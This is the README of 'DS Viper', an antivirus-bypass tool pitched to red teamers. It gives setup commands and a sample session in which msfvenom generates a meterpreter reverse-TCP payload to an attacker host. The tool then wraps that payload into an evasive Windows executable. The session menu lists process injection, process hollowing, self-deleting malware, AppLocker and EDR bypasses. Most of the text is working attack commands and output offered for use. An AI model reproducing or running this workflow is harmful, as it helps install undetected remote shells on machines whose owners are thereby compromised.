DS Viper is a powerful tool designed to bypass Windows Defender's security mechanisms, enabling seamless execution of payloads on Windows systems without triggering security alerts. It utilizes a combination of advanced techniques to manipulate and disguise payloads, providing cybersecurity professionals, red teamers, and penetration testers with a robust solution for achieving undetected access.
Whether you're simulating real-world attacks or conducting comprehensive security audits, DS Viper serves as an essential tool for testing and improving system defenses.
We are constantly working on DS Viper to enhance its capabilities, improve evasion techniques, and introduce customizable features such as the ability to add your own payloads or keywords.
Clone the repository and set up the environment.
git clone https://github.com/dagowda/DSViper.git
cd DSViper
pip install -r requirements.txt
sudo apt-get update
sudo apt-get install -y mingw-w64
sudo apt install mono-complete
chmod +x MASM-compatible/uasm
sudo cp MASM-compatible/uasm /usr/bin/uasmIf you prefer an automated setup, use the provided script:
chmod +x install_dependencies.sh
./install_dependencies.shMake the DSViper executable and run it:
➜ DSViper git:(main) ✗ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.130.175 LPORT=443 -f raw > payload.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 201798 bytes
➜ DSViper git:(main) ✗ ./DSViper
░▒▓███████▓▒░ ░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓███████▓▒░░▒▓████████▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░░▒▓██████▓▒░ ░▒▓█▓▒▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░░▒▓██████▓▒░ ░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓████████▓▒░▒▓█▓▒░░▒▓█▓▒░
................................................
AntiVirus Bypass Tool (v.0.2.1)
---------------------------------------------------------
Created by Dhanush Gowda(dagowda) and Sumanth Vanki
---------------------------------------------------------
................................................
You sure you want to Continue?(Use it ethically, and in lab enviroments only) y/n: y
Enter your payload choice:
1.)self-injection(XOR)
2.)self-injection(AES)
3.)Process Injection(spoolsv)(Can be used for lateral movement)
4.)Process Hollow
5.)Self Deleting Malware(HAVE TO WAIT, CLOSE TO A MINUTE FOR THE PAYLOAD TO EXECUTE)
6.)DLL side-load/rundll32 applocker bypass
7.)Process Injection(explorer.exe)
8.)Powershell(Will bypass with cloud detections enabled as well)(Make sure to run this payload twice)(use x64 payload only)
9.)Applocker bypass small shellcodes(Make sure to use x86 payloads)(Also make sure to change the .exe file name after everyrun on the same victim)(Make sure you run this payload twice)
10.)Applocker bypass Havoc/large shellcodes(use x86 payloads only)
11.)Indirect Syscall(Windows 10)(Possible EDR bypass loader)
>2
Please type in the shellcode file name: payload.bin
Selected self-injection(AES)
[*]Payload successfully created as DSViper_AES.exe- Ensure you have Python 3.8+ installed.
- Run the commands in a terminal with the required permissions.
